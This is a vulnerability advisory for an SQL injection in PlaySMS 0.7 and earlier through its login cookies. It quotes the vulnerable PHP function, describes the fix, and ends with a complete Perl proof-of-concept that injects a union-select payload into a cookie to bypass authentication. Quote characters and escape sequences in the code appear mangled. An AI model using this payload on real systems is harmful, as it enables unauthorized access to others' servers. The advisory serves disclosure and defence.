‘PlaySMS SQL Injection via Cookie’

Summary

PlaySMS is ‘a full-featured SMS gateway application that features sending of single or broadcast SMSes, the ability to receive and forward SMSes, an SMS board, an SMS polling system, SMS customs for handling incoming SMSes and forwarding them to custom applications, and SMS commands for saving/retrieving information to/from a server and executing server-side shell scripts’.

An SQL Injection vulnerability in the product allows remote attackers to inject arbitrary SQL statements via the cookie mechanism used by the product.’

Credit:

‘The information has been provided by Noam Rathaus.’


Details

Vulnerable Systems:
 * PlaySMS version 0.7 and prior

Immune Systems:
 * PlaySMS version 0.7.1 or newer

Vulnerable code:
The vulnerability is located in the function valid():

function valid($var_ticket=”,$var_username=”)
{
    $ticket = $_COOKIE[vc1];
    $username = $_COOKIE[vc2];
    if ($var_ticket && $var_username)
    {
        $ticket = $var_ticket;
        $username = $var_username;
    }
    $db_query = ‘SELECT ticket FROM tblUser WHERE username=’$username”;
    $db_result = dba_query($db_query);
    $db_row = dba_fetch_array($db_result);
    if ($ticket && $db_row[ticket] && ($ticket==$db_row[ticket]))
    {
        return 1;
    }
    else
    {
        return 0;
    }
}

If you look at the way the function works, the cookie information is received as is. This is true only if the ‘magic_quotes_gpc’ setting is set to ‘Off’ (NOTE: This is discouraged by the author of the program in the INSTALL file).

In the case where ‘Off’ is set the following Perl script will illustrate how it can access the fr_left.php script without having provided any username or password.

Solution:
The author of the program has addressed the vulnerability by including code that will filter out any incoming malicious code, whenever the magic_quotes_gpc is set to ‘Off’. In addition the author took care of those cases where Microsoft SQL Server is used as the backend and that normal filtering is not enough.

Side note:
Please note that addslashes will NOT work with Microsoft SQL. Since Microsoft SQL does not use he backslash character as an escape mechanism. Just double your quotes instead. Or use this:

function mssql_addslashes($data) {
   $data = str_replace(”’, ””, $data);
   return $data;
}

Exploit:
#!/usr/bin/perl
# PlaySMS version 0.7 and prior SQL Injection PoC
# Written by Noam Rathaus of Beyond Security Ltd.
#

use IO::Socket;
use strict;

my $host = $ARGV[0];

my $remote = IO::Socket::INET->new ( Proto => ‘tcp’, PeerAddr => $host, PeerPort => ’80’ );

unless ($remote) { die ‘cannot connect to http daemon on $host’ }

print ‘connectedn’;

$remote->autoflush(1);

my $http = ‘GET /~playsms/fr_left.php HTTP/1.1r
Host: $host:80r
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712
Firefox/0.9.1r
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5r
Accept-Language: en-us,en;q=0.5r
Accept-Encoding: gzip,deflater
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7r
Keep-Alive: 300r
Cookie: vc1=ticket; vc2=’%20union%20select%20’ticket;
Content-Type: application/x-www-form-urlencodedr
Connection: closer

‘;

print ‘HTTP: [$http]n’;
print $remote $http;
sleep(1);
print ‘Sentn’;

while (<$remote>)
{
print $_;
}
print ‘n’;

close $remote;’

Categories: UNIX